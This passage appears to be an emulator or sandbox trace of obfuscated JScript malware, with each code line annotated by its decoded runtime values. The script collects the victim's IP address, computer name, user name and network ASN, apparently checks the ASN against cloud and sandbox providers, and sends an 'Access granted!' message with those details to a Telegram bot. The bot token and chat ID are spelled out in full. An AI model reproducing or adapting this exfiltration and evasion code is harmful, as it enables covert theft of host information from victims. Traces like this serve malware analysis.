88	return _0x1660e2 ( _0x4e29d1 );	_0x1660e2(""6481270908"") ➔ ""6481270908"" _0x1660e2(""Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"") ➔ ""Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"" _0x1660e2("chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones") ➔ ""chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones""
89	},
90	'NctIL' : function (_0x5a9cef, _0xbf9cfd) {	[object Object].NctIL("{"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"","}") ➔ "{"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"}"
91	return _0x5a9cef + _0xbf9cfd;
92	},
93	'ulAzN' : function (_0x31217e, _0x14b597) {	[object Object].ulAzN("{",""chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"") ➔ "{"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones""
94	return _0x31217e + _0x14b597;
95	}
96	}, _0x1aba27 = typeof _0x2b0ae1;
97	function _0x1b91b7(_0x2ec449, _0x25f319, _0x337d48, _0x55528e) {	_0x1b91b7(-63,-61,-89,-143) ➔ "string" _0x1b91b7(-116,-187,-182,-169) ➔ "object" _0x1b91b7(9,12,-67,-115) ➔ "zKJwB" _0x1b91b7(-86,-76,-14,-116) ➔ "WMEaH" _0x1b91b7(-81,-237,-140,-121) ➔ "wliKQ" _0x1b91b7(-66,85,-17,76) ➔ "UWTbO" _0x1b91b7(-76,-7,-100,-194) ➔ "mxDMK" _0x1b91b7(-179,-125,-100,-137) ➔ "mxDMK" _0x1b91b7(-81,-237,-140,-121) ➔ "wliKQ" _0x1b91b7(-66,85,-17,76) ➔ "UWTbO"
98	return _0x44b961 ( _0x25f319, _0x25f319 - 0x1a4, _0x337d48 - 0x9, _0x337d48 - 0x98 );	_0x44b961(-61,-481,-98,-241) ➔ "string" _0x44b961(-187,-607,-191,-334) ➔ "object" _0x44b961(12,-408,-76,-219) ➔ "zKJwB" _0x44b961(-76,-496,-23,-166) ➔ "WMEaH" _0x44b961(-237,-657,-149,-292) ➔ "wliKQ" _0x44b961(85,-335,-26,-169) ➔ "UWTbO" _0x44b961(-7,-427,-109,-252) ➔ "mxDMK" _0x44b961(-125,-545,-109,-252) ➔ "mxDMK" _0x44b961(-237,-657,-149,-292) ➔ "wliKQ" _0x44b961(85,-335,-26,-169) ➔ "UWTbO"
99	}
100	if ( _0x4d8dc6[_0x1b91b7 ( 0x9, 0xc, - 0x43, - 0x73 ) ] ( _0x1aba27, _0x20f93a ( - 0x231, - 0x20a, - 0x21c, - 0x267 ) ) \|\| _0x4d8dc6[_0x1b91b7 ( - 0x56, - 0x4c, - 0xe, - 0x74 ) ] ( _0x2b0ae1, null ) )	_0x1b91b7(9,12,-67,-115) ➔ "zKJwB" _0x20f93a(-561,-522,-540,-615) ➔ "object" [object Object].zKJwB("object","object") ➔ false _0x1b91b7(-86,-76,-14,-116) ➔ "WMEaH" [object Object].WMEaH([object Object],null) ➔ false
101	{
102	if ( _0x4d8dc6[_0x1b91b7 ( - 0x38, - 0x32, - 0x4d, - 0xc ) ] ( _0x1aba27, _0x4d8dc6[_0x1b91b7 ( 0x3d, - 0x21, - 0x11, - 0xb ) ] ) )
103	_0x2b0ae1 = _0x4d8dc6[_0x1b91b7 ( - 0xb4, - 0x4, - 0x64, - 0x68 ) ] ( _0x4d8dc6[_0x20f93a ( - 0x1bd, - 0x163, - 0x16a, - 0x1a9 ) ] ( '\x22', _0x2b0ae1 ), '\x22' );
104	return String ( _0x2b0ae1 );
105	}
106	else
107	{
108	if ( _0x4d8dc6[_0x20f93a ( - 0x290, - 0x229, - 0x22e, - 0x270 ) ] === _0x4d8dc6[_0x20f93a ( - 0x267, - 0x229, - 0x22f, - 0x1da ) ] )	_0x20f93a(-656,-553,-558,-624) ➔ "PsjHM" _0x20f93a(-615,-553,-559,-474) ➔ "PsjHM"
109	{
110	var _0x5c967a, _0x495621, _0x49bb67 = [], _0x1e479d = _0x2b0ae1 && _0x2b0ae1[_0x20f93a ( - 0x183, - 0x1dd, - 0x1c5, - 0x190 ) + 'r'] == Array;	_0x20f93a(-387,-477,-453,-400) ➔ "constructo"
111	for (_0x5c967a in _0x2b0ae1 )
112	{
113	_0x495621 = _0x2b0ae1[_0x5c967a], _0x1aba27 = typeof _0x495621;
114	if ( _0x4d8dc6[_0x1b91b7 ( - 0x51, - 0xed, - 0x8c, - 0x79 ) ] ( _0x1aba27, _0x4d8dc6[_0x1b91b7 ( - 0x42, 0x55, - 0x11, 0x4c ) ] ) )	_0x1b91b7(-81,-237,-140,-121) ➔ "wliKQ" _0x1b91b7(-66,85,-17,76) ➔ "UWTbO" [object Object].wliKQ("string","string") ➔ true _0x1b91b7(-81,-237,-140,-121) ➔ "wliKQ" _0x1b91b7(-66,85,-17,76) ➔ "UWTbO" [object Object].wliKQ("string","string") ➔ true
115	_0x495621 = _0x4d8dc6[_0x20f93a ( - 0x1dc, - 0x1b8, - 0x1dd, - 0x21c ) ] ( '\x22', _0x495621 ) + '\x22';	_0x20f93a(-476,-440,-477,-540) ➔ "mxDMK" [object Object].mxDMK(""","6481270908") ➔ ""6481270908" _0x20f93a(-476,-440,-477,-540) ➔ "mxDMK" [object Object].mxDMK(""","Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones") ➔ ""Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"
116	else
117	{
118	if ( _0x4d8dc6[_0x20f93a ( - 0x143, - 0x1a1, - 0x14a, - 0x1aa ) ] ( _0x1aba27, _0x4d8dc6['uFpvD'] ) && _0x4d8dc6[_0x1b91b7 ( 0x1d, - 0x33, - 0x36, - 0x88 ) ] ( _0x495621, null ) )
119	_0x495621 = JSON[_0x20f93a ( - 0x1ca, - 0x1d8, - 0x176, - 0x23e ) ] ( _0x495621 );
120	}
121	_0x49bb67[_0x20f93a ( - 0x1ff, - 0x1d0, - 0x207, - 0x1b3 ) ] ( _0x4d8dc6[_0x1b91b7 ( - 0x4c, - 0x7, - 0x64, - 0xc2 ) ] ( _0x1e479d ? '' : _0x4d8dc6[_0x20f93a ( - 0x179, - 0x1b8, - 0x157, - 0x1e7 ) ] ( _0x4d8dc6[_0x1b91b7 ( - 0xb3, - 0x7d, - 0x64, - 0x89 ) ] ( '\x22', _0x5c967a ), '\x22:' ), _0x4d8dc6[_0x20f93a ( - 0x168, - 0x1b9, - 0x20d, - 0x212 ) ] ( String, _0x495621 ) ) );	_0x20f93a(-511,-464,-519,-435) ➔ "push" _0x1b91b7(-76,-7,-100,-194) ➔ "mxDMK" _0x20f93a(-377,-440,-343,-487) ➔ "mxDMK" _0x1b91b7(-179,-125,-100,-137) ➔ "mxDMK" [object Object].mxDMK(""","chat_id") ➔ ""chat_id" [object Object].mxDMK(""chat_id","":") ➔ ""chat_id":" _0x20f93a(-360,-441,-525,-530) ➔ "OLQwB" [object Object].OLQwB( function String(),""6481270908"") ➔ ""6481270908"" [object Object].mxDMK(""chat_id":",""6481270908"") ➔ ""chat_id":"6481270908"" _0x20f93a(-511,-464,-519,-435) ➔ "push" _0x1b91b7(-76,-7,-100,-194) ➔ "mxDMK" _0x20f93a(-377,-440,-343,-487) ➔ "mxDMK" _0x1b91b7(-179,-125,-100,-137) ➔ "mxDMK" [object Object].mxDMK(""","text") ➔ ""text" [object Object].mxDMK(""text","":") ➔ ""text":" _0x20f93a(-360,-441,-525,-530) ➔ "OLQwB" [object Object].OLQwB( function String(),""Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"") ➔ ""Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"" [object Object].mxDMK(""text":",""Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"") ➔ ""text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones""
122	}
123	return _0x4d8dc6[_0x20f93a ( - 0x14a, - 0x18f, - 0x13a, - 0x1a0 ) ] ( _0x4d8dc6['ulAzN'] ( _0x1e479d ? '[' : '{', _0x4d8dc6[_0x1b91b7 ( - 0x56, - 0xc, - 0x65, - 0xb2 ) ] ( String, _0x49bb67 ) ), _0x1e479d ? ']' : '}' );	_0x20f93a(-330,-399,-314,-416) ➔ "NctIL" _0x1b91b7(-86,-12,-101,-178) ➔ "OLQwB" [object Object].OLQwB( function String(),"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones") ➔ ""chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"" [object Object].ulAzN("{",""chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"") ➔ "{"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"" [object Object].NctIL("{"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"","}") ➔ "{"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"}"
124	}
125	else
126	_0x198b37 = _0x4d8dc6[_0x1b91b7 ( - 0x14, - 0x5f, - 0xf, 0x19 ) ] ( _0x4d8dc6[_0x1b91b7 ( 0x22, - 0x4c, - 0xf, 0x20 ) ] ( _0x148edf, '\x5c' ), _0x65ba40 );
127	}
128	};
129	function _0xbb87(_0x4b20e2, _0x177f14) {	_0xbb87(376,-536) ➔ "ings"
130	var _0x5e5598 = _0x51d7 ( );	_0x51d7() ➔ wfb1Bwm,vfzJCu8,BI9QC29U,mcaOv2LUzg93CW,mZC1mJHUCK9JrxG,sLDkvKm3AgPhqq,n3W0Fdv8mNW4Fa,D2XPs1e,y29TChv0zxjoyq,ienOCM9Tzs83mW,y29UC3rYDwn0BW,vhLWzq,CM1sy2O,uMPfzgO,qvm0nZq0mq,C3rYAw5NAwz5,t0z3vg4,z2vZlMrLDI85oa,DvDjyNG,AKTmrNO,qvmYmdq3mW,rM5cDLu,AK9HC0K,ChvZAa,lcbvC2vYoIa,CMvZCg9UC2vcBW,yxnU,CM9UBwvUDfn0CG,y2fuCw0,sgrurNm,EKnPDNC,ExDmwK4,ohW1FdL8mNWXma,yKTJwg8,tZi1BxDN,rwzosMK,lMPHCG,DKThtK4,rwnOBW,AwTLieDLy2TVkq,mtaWnJK5odzLz1vTs0m,qvmXmJG3na,mtvowfHQtMi,Aw1pvK0,t2f6Ahy,sgvHzgvY,t0XrD0i,BxHetuS,nZqWnZe2B3PUCM9M,ALLItfe,qvmZotyZnJi,rM1WyM4,rxHWyw5Krw52Aq,yLLnsM8,CgjUDgS,zLburw8,nxWZ,AMf2ysaTAMfYia,C3rYAw5N,C3rHDhvZ,oKfbrKj1y0yWvq,AxbbzgrYzxnZ,C2f2zxrVzMLSzq,qvmZmdyZmW,qvm0nJu2mG,CNbfzKC,qwnJzxnZigDYyq,vfjJvKe,mZiZnJa2ne9LDMfXuW,qvm4ntyW,CNDWD28,tvnytuWYlLnLCG,q29UDgvUDc1uEq,yxbWBgLJyxrPBW,y2HHDf9Pza,sevyswG,r0vu,nJi3mdmWmejJALLjEG,qvmXnZq,junptvbvvevstG,EKTkD0i,qvmYnti5mq,EhrQzgjPBwfUCG,l3nLBMrnzxnZyq,wMniA1u,D3ndDKu,CgfYC2u,qvmXmJCZmq,tMn0suW,qvm3nZG2,tgHsthm,qwnJzxnZigjSBW,mJKWnJG3nK95tLf4Cq,A0rAEhq,qwrVzgiUu3rYzq,qvmYndK2mq,Ahr0Chm6lY9QCW,B3Dds0q,ruXozeq,ufrqqwO,y2XVC2u,DMzozKi,C2v0uMvXDwvZDa,suLduLi,Bxn4BwWYlNHTBa,vxnLCI1bz2vUDa,ChjVDg90ExbL,y291BNrYEunVza,ifnHzMfYAs81mW,qvmZnJm1mq,ie5HBwu6ia,vLH6vKC,uxvPDa,uMHnB0G,nY4ZnG,DxnLCG,C3bSAxq,v2LUnJq7ihG2na,Ahr0Chm6lY9HCa,nty1ntq4BLn1CMDj,qvm5mda5,odyXswHXz2PX,C2vUza,lNzICW,rxDUtKC,rhnhr1i,A0vItwe,icHlsfrntcWGBa,lJaUmZy4mY44nG,r3LivMO,vvDuyK8,uKTrthC,yNnmwhe,v01fyuG,EMv4s1u,vM96txu,Ahr0Chm6lY90zq,qvmYmdi0mde,qvmYnte2ma,weXltKC,Cu5PswS,uhnQse0,uKzeCu8,qvmYotm4nG,lcbdB21WDxrLCG,we1msfruua,AfffwMe,B24Uz2vVAxbSBW,rKzZCeW,mxW0Fdz8mhWYFa,jvvtrvjoqu1fjq,s2L0lZuZnY4ZnG,BKvvCNq,ywrSv3m,ie5uideWlJa7ia,BwLUAwfSBc5Wyq,EvHfBxy,CNvU,B3bLBG,vw5RBM93BG,zwXS,EgTIyw8,qu1fjq,qvmXotG2mdu,CfL6z0W,tKT6swq,y291BNrYEv9JBW,qvmXmti3na,otG1nZuUANm,jxrLBxaL,lNDZzG,B2T1Cc5PBY8,B2jQzwn0,Fdz8mte,v0DxAuy,y2TLzceGsva6ia,DMvYwe1msfruua,q3jLyxrLt2jQzq,t2zVuNC,qvmYnJyYoq,Dgv4Da,tw96AwXSys81lG,qvmXnda2mq,qvm5ndG0,qvm4mdC1,rNz5q1m,Aw5NCW,twLJCM9ZB2z0lG,yKTXqKy,D3nJCMLWDcaI,BgvUz3rO,As50zwXLz3jHBq,qvmXndyXoa,zw5KC1DPDgG,v0fRqLO,tNjoDxC,CufhEve,Ahr0Ca,CMvZCg9UC2vuzq,y0XUuKO,rwXgsfa,qvmYotGZoa,qvmXnte2oq,D3jPDgu,Ahfgqxe,qvmYnZu5nq,ugLey0m
131	return _0xbb87 =
132	function (_0x587788, _0x1c3640) {	_0xbb87(376,-536) ➔ "ings" _0xbb87(349,-675) ➔ "Unknown" _0xbb87(325,-528) ➔ "VozMu" _0xbb87(305,-470) ➔ "user" _0xbb87(299,-534) ➔ "AS36351" _0xbb87(297,-652) ➔ "countryCod" _0xbb87(378,-499) ➔ "bKqBF" _0xbb87(261,-761) ➔ "MSXML2.Ser" _0xbb87(334,-549) ➔ ", Computer" _0xbb87(376,-536) ➔ "Microsoft."
133	_0x587788 = _0x587788 - ( - 0x90b * 0x4 + 0x1 * 0xf3b + - 0x319 * - 0x7 );
134	var _0x15866b = _0x5e5598[_0x587788];
135	if ( _0xbb87['zjOpqs'] === undefined )
136	{
137	var _0x1823fb = function (_0xb948c3) {	function (_0x587788, _0x1c3640).zEZFuP("Aw5NCW") ➔ "ings" function (_0x587788, _0x1c3640).zEZFuP("vw5RBM93BG") ➔ "Unknown" function (_0x587788, _0x1c3640).zEZFuP("vM96txu") ➔ "VozMu" function (_0x587788, _0x1c3640).zEZFuP("DxnLCG") ➔ "user" function (_0x587788, _0x1c3640).zEZFuP("qvmZnJm1mq") ➔ "AS36351" function (_0x587788, _0x1c3640).zEZFuP("y291BNrYEunVza") ➔ "countryCod" function (_0x587788, _0x1c3640).zEZFuP("yKTXqKy") ➔ "bKqBF" function (_0x587788, _0x1c3640).zEZFuP("tvnytuWYlLnLCG") ➔ "MSXML2.Ser" function (_0x587788, _0x1c3640).zEZFuP("lcbdB21WDxrLCG") ➔ ", Computer" function (_0x587788, _0x1c3640).zEZFuP("twLJCM9ZB2z0lG") ➔ "Microsoft."
138	var _0x5a6d28 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
139	var _0x25be5f = '', _0x3edb7f = '';
140	for ( var _0x4111e6 = 0x1ae1 * 0x1 + - 0x1b8f + - 0x3a * - 0x3, _0x2bbc7a, _0x5a7f58, _0x396d17 = - 0x160a + 0xea2 + - 0x18 * - 0x4f ; _0x5a7f58 = _0xb948c3['charAt'] ( _0x396d17 ++ ) ; ~ _0x5a7f58 && ( _0x2bbc7a = _0x4111e6 % ( 0xfd9 * - 0x1 + 0x1929 + - 0x94c ) ? _0x2bbc7a * ( - 0x1514 + - 0x1 * 0xb65 + - 0x1 * - 0x20b9 ) + _0x5a7f58 : _0x5a7f58, _0x4111e6 ++ % ( - 0x1 * - 0x15d3 + - 0x93b + 0x14 * - 0xa1 ) ) ? _0x25be5f += String['fromCharCode'] ( 0x268 + - 0xa18 + 0x8af * 0x1 & _0x2bbc7a >> ( - ( - 0x2597 * 0x1 + - 0x3a6 + - 0x293f * - 0x1 ) * _0x4111e6 & 0x6 * 0x380 + 0x1c44 + 0x189f * - 0x2 ) ) : - 0x37c + 0x2673 + - 0x22f7 )
141	{
142	_0x5a7f58 = _0x5a6d28['indexOf'] ( _0x5a7f58 );
143	}
144	for ( var _0x2ecba2 = 0x5 * - 0x327 + - 0x3e1 + 0x13a4, _0x9e1250 = _0x25be5f['length'] ; _0x2ecba2 < _0x9e1250 ; _0x2ecba2 ++ )
145	{
146	_0x3edb7f += '%' + ( '00' + _0x25be5f['charCodeAt'] ( _0x2ecba2 ) ['toString'] ( 0x3 * 0x2d5 + - 0x190c * - 0x1 + - 0x217b ) )['slice'] ( - ( 0x1 * 0x1457 + - 0xe46 + - 0x60f ) );
147	}
148	return decodeURIComponent ( _0x3edb7f );	decodeURIComponent("%69%6e%67%73") ➔ "ings" decodeURIComponent("%55%6e%6b%6e%6f%77%6e") ➔ "Unknown" decodeURIComponent("%56%6f%7a%4d%75") ➔ "VozMu" decodeURIComponent("%75%73%65%72") ➔ "user" decodeURIComponent("%41%53%33%36%33%35%31") ➔ "AS36351" decodeURIComponent("%63%6f%75%6e%74%72%79%43%6f%64") ➔ "countryCod" decodeURIComponent("%62%4b%71%42%46") ➔ "bKqBF" decodeURIComponent("%4d%53%58%4d%4c%32%2e%53%65%72") ➔ "MSXML2.Ser" decodeURIComponent("%2c%20%43%6f%6d%70%75%74%65%72") ➔ ", Computer" decodeURIComponent("%4d%69%63%72%6f%73%6f%66%74%2e") ➔ "Microsoft."
149	};
150	_0xbb87['zEZFuP'] = _0x1823fb, _0x4b20e2 = arguments, _0xbb87['zjOpqs'] = ! ! [];
151	}
152	var _0x306b39 = _0x5e5598[0x10 * 0xb3 + 0x1f90 + - 0x2ac0], _0x2c08f6 = _0x587788 + _0x306b39, _0x348706 = _0x4b20e2[_0x2c08f6];
153	return ! _0x348706 ? ( _0x15866b = _0xbb87['zEZFuP'] ( _0x15866b ), _0x4b20e2[_0x2c08f6] = _0x15866b ) : _0x15866b = _0x348706, _0x15866b;	function (_0x587788, _0x1c3640).zEZFuP("Aw5NCW") ➔ "ings" function (_0x587788, _0x1c3640).zEZFuP("vw5RBM93BG") ➔ "Unknown" function (_0x587788, _0x1c3640).zEZFuP("vM96txu") ➔ "VozMu" function (_0x587788, _0x1c3640).zEZFuP("DxnLCG") ➔ "user" function (_0x587788, _0x1c3640).zEZFuP("qvmZnJm1mq") ➔ "AS36351" function (_0x587788, _0x1c3640).zEZFuP("y291BNrYEunVza") ➔ "countryCod" function (_0x587788, _0x1c3640).zEZFuP("yKTXqKy") ➔ "bKqBF" function (_0x587788, _0x1c3640).zEZFuP("tvnytuWYlLnLCG") ➔ "MSXML2.Ser" function (_0x587788, _0x1c3640).zEZFuP("lcbdB21WDxrLCG") ➔ ", Computer" function (_0x587788, _0x1c3640).zEZFuP("twLJCM9ZB2z0lG") ➔ "Microsoft."
154	}, _0xbb87 ( _0x4b20e2, _0x177f14 );
155	}
156	function _0x44b961(_0xee3184, _0x5c355e, _0x408745, _0xe5e464) {	_0x44b961(-343,-298,-331,-304) ➔ "AS15169" _0x44b961(-97,-242,-82,-179) ➔ "AS9009" _0x44b961(-399,-380,-355,-322) ➔ "AS8075" _0x44b961(-135,-124,-66,-161) ➔ "AS25160" _0x44b961(-247,-283,-229,-305) ➔ "AS29838" _0x44b961(-225,-257,-167,-235) ➔ "AS46562" _0x44b961(-309,-339,-371,-343) ➔ "AS198605" _0x44b961(-318,-221,-223,-323) ➔ "AS9484" _0x44b961(-365,-291,-345,-339) ➔ "AS11274" _0x44b961(-198,-226,-207,-212) ➔ "AS12731"
157	return _0xbb87 ( _0xe5e464 - - 0x22c, _0xee3184 );	_0xbb87(252,-343) ➔ "AS15169" _0xbb87(377,-97) ➔ "AS9009" _0xbb87(234,-399) ➔ "AS8075" _0xbb87(395,-135) ➔ "AS25160" _0xbb87(251,-247) ➔ "AS29838" _0xbb87(321,-225) ➔ "AS46562" _0xbb87(213,-309) ➔ "AS198605" _0xbb87(233,-318) ➔ "AS9484" _0xbb87(217,-365) ➔ "AS11274" _0xbb87(344,-198) ➔ "AS12731"
158	}
159	function sendTelegramNotification(_0x40562b) {	sendTelegramNotification("Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones") ➔ undefined
160	function _0x5dbc47(_0xf8cb31, _0x30fbfc, _0x2779d6, _0x5ed458) {	_0x5dbc47(-447,-377,-368,-457) ➔ "imOVM" _0x5dbc47(-417,-420,-315,-395) ➔ "applicatio" _0x5dbc47(-372,-398,-473,-390) ➔ "https://ap" _0x5dbc47(-506,-434,-521,-444) ➔ "i.telegram" _0x5dbc47(-521,-577,-425,-493) ➔ "verXMLHTTP" _0x5dbc47(-484,-464,-456,-381) ➔ "7\|4\|5\|2\|8\|" _0x5dbc47(-430,-437,-370,-435) ➔ ":AAFBucF0U" _0x5dbc47(-485,-404,-464,-491) ➔ "JWJVC7hjGA" _0x5dbc47(-456,-399,-552,-409) ➔ "O25mwg" _0x5dbc47(-453,-515,-540,-543) ➔ "vKGNN"
161	return _0x44b961 ( _0x2779d6, _0x30fbfc - 0xab, _0x2779d6 - 0x1ae, _0xf8cb31 - - 0xbf );	_0x44b961(-368,-548,-798,-256) ➔ "imOVM" _0x44b961(-315,-591,-745,-226) ➔ "applicatio" _0x44b961(-473,-569,-903,-181) ➔ "https://ap" _0x44b961(-521,-605,-951,-315) ➔ "i.telegram" _0x44b961(-425,-748,-855,-330) ➔ "verXMLHTTP" _0x44b961(-456,-635,-886,-293) ➔ "7\|4\|5\|2\|8\|" _0x44b961(-370,-608,-800,-239) ➔ ":AAFBucF0U" _0x44b961(-464,-575,-894,-294) ➔ "JWJVC7hjGA" _0x44b961(-552,-570,-982,-265) ➔ "O25mwg" _0x44b961(-540,-686,-970,-262) ➔ "vKGNN"
162	}
163	var _0x19d816 = {
164	};
165	_0x19d816[_0x2f85cf ( 0x19e, 0x165, 0x174, 0x11b ) ] =	_0x2f85cf(414,357,372,283) ➔ "ZcHkU"
166	function (_0x1f958b, _0xd42dc1) {	[object Object].ZcHkU(200,200) ➔ true
167	return _0x1f958b == _0xd42dc1;
168	}, _0x19d816[_0x5dbc47 ( - 0x1bf, - 0x179, - 0x170, - 0x1c9 ) ] = 'POST', _0x19d816['zexKU'] = _0x5dbc47 ( - 0x1a1, - 0x1a4, - 0x13b, - 0x18b ) + _0x2f85cf ( 0x11f, 0x113, 0xf5, 0x10f ),
169	_0x19d816[_0x2f85cf ( 0x17e, 0x136, 0x173, 0x10d ) ] =	_0x2f85cf(382,310,371,269) ➔ "vKGNN"
170	function (_0x545b7a, _0x62cbef) {	[object Object].vKGNN("https://api.telegram.org/bot","6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg") ➔ "https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg" [object Object].vKGNN("https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg","/sendMessage") ➔ "https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage"
171	return _0x545b7a + _0x62cbef;
172	}, _0x19d816[_0x2f85cf ( 0x187, 0x12d, 0xdb, 0x10d ) ] = _0x5dbc47 ( - 0x174, - 0x18e, - 0x1d9, - 0x186 ) + _0x5dbc47 ( - 0x1fa, - 0x1b2, - 0x209, - 0x1bc ) + '.org/bot', _0x19d816[_0x2f85cf ( 0x155, 0xf4, 0xf1, 0x12b ) ] = _0x2f85cf ( 0x13f, 0x164, 0x111, 0x13e ) + 'ge', _0x19d816[_0x2f85cf ( 0x136, 0x104, 0xe3, 0xf8 ) ] = _0x2f85cf ( 0x117, 0x158, 0xfd, 0x19c ) + _0x5dbc47 ( - 0x209, - 0x241, - 0x1a9, - 0x1ed );
173	function _0x2f85cf(_0x206c22, _0x4eca9e, _0x5d2b1a, _0x450229) {	_0x2f85cf(414,357,372,283) ➔ "ZcHkU" _0x2f85cf(287,275,245,271) ➔ "n/json" _0x2f85cf(382,310,371,269) ➔ "vKGNN" _0x2f85cf(391,301,219,269) ➔ "caTqm" _0x2f85cf(341,244,241,299) ➔ "OfoRw" _0x2f85cf(319,356,273,318) ➔ "/sendMessa" _0x2f85cf(310,260,227,248) ➔ "WAkBZ" _0x2f85cf(279,344,253,412) ➔ "MSXML2.Ser" _0x2f85cf(424,389,430,414) ➔ "split" _0x2f85cf(331,310,306,391) ➔ "vKGNN"
174	return _0x44b961 ( _0x206c22, _0x4eca9e - 0x1d4, _0x5d2b1a - 0x1df, _0x4eca9e - 0x23c );	_0x44b961(414,-111,-107,-215) ➔ "ZcHkU" _0x44b961(287,-193,-234,-297) ➔ "n/json" _0x44b961(382,-158,-108,-262) ➔ "vKGNN" _0x44b961(391,-167,-260,-271) ➔ "caTqm" _0x44b961(341,-224,-238,-328) ➔ "OfoRw" _0x44b961(319,-112,-206,-216) ➔ "/sendMessa" _0x44b961(310,-208,-252,-312) ➔ "WAkBZ" _0x44b961(279,-124,-226,-228) ➔ "MSXML2.Ser" _0x44b961(424,-79,-49,-183) ➔ "split" _0x44b961(331,-158,-173,-262) ➔ "vKGNN"
175	}
176	var _0x475121 = _0x19d816, _0x5d0c8d = ( _0x5dbc47 ( - 0x1e4, - 0x1d0, - 0x1c8, - 0x17d ) + '1\|3\|6\|0' )[_0x2f85cf ( 0x1a8, 0x185, 0x1ae, 0x19e ) ] ( '\|' ), _0x21a8b7 = 0x175 * - 0x5 + - 0x5 * - 0x59c + - 0x427 * 0x5;	_0x5dbc47(-484,-464,-456,-381) ➔ "7\|4\|5\|2\|8\|" _0x2f85cf(424,389,430,414) ➔ "split" "7\|4\|5\|2\|8\|1\|3\|6\|0".split("\|") ➔ 7,4,5,2,8,1,3,6,0
177	while (! ! [ ] )
178	{
179	switch ( _0x5d0c8d[_0x21a8b7 ++] ) {
180	case '0' :
181	if ( _0x475121[_0x2f85cf ( 0x1ae, 0x165, 0x145, 0x182 ) ] ( _0xb64ff9[_0x2f85cf ( 0x10c, 0x14c, 0x189, 0x141 ) ], 0x39 * 0x9f + - 0x565 + - 0x1d3a ) )	_0x2f85cf(430,357,325,386) ➔ "ZcHkU" _0x2f85cf(268,332,393,321) ➔ "status" [object Object].ZcHkU(200,200) ➔ true
182	{
183	}
184	else
185	{
186	}
187	continue ;
188	case '1' :
189	_0xb64ff9['open'] ( _0x475121['imOVM'], _0x32e2fb, ! [] );	open("POST","https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage",false) ➔ undefined
190	continue ;
191	case '2' :
192	var _0x459b98 = {
193	};
194	_0x459b98[_0x5dbc47 ( - 0x1a0, - 0x180, - 0x1d5, - 0x1c8 ) ] = _0x4718fa, _0x459b98[_0x5dbc47 ( - 0x205, - 0x262, - 0x205, - 0x25d ) ] = _0x40562b;	_0x5dbc47(-416,-384,-469,-456) ➔ "chat_id" _0x5dbc47(-517,-610,-517,-605) ➔ "text"
195	var _0x93cd6d = _0x459b98;
196	continue ;
197	case '3' :
198	_0xb64ff9[_0x5dbc47 ( - 0x184, - 0x1b6, - 0x131, - 0x141 ) + _0x2f85cf ( 0x13e, 0x13e, 0x167, 0xf4 ) ] ( _0x2f85cf ( 0x14b, 0x159, 0x15b, 0x177 ) + 'pe', _0x475121[_0x2f85cf ( 0x194, 0x197, 0x174, 0x193 ) ] );	_0x5dbc47(-388,-438,-305,-321) ➔ "setRequest" _0x2f85cf(318,318,359,244) ➔ "Header" _0x2f85cf(331,345,347,375) ➔ "Content-Ty" _0x2f85cf(404,407,372,403) ➔ "zexKU" setRequestHeader("Content-Type","application/json") ➔ undefined
199	continue ;
200	case '4' :
201	var _0x4718fa = '6481270908';
202	continue ;
203	case '5' :
204	var _0x32e2fb = _0x475121[_0x5dbc47 ( - 0x1c5, - 0x203, - 0x21c, - 0x21f ) ] ( _0x475121[_0x2f85cf ( 0x14b, 0x136, 0x132, 0x187 ) ] ( _0x475121['caTqm'], _0x430563 ), _0x475121[_0x2f85cf ( 0x8f, 0xf4, 0xb8, 0x129 ) ] );	_0x5dbc47(-453,-515,-540,-543) ➔ "vKGNN" _0x2f85cf(331,310,306,391) ➔ "vKGNN" [object Object].vKGNN("https://api.telegram.org/bot","6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg") ➔ "https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg" _0x2f85cf(143,244,184,297) ➔ "OfoRw" [object Object].vKGNN("https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg","/sendMessage") ➔ "https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage"
205	continue ;
206	case '6' :
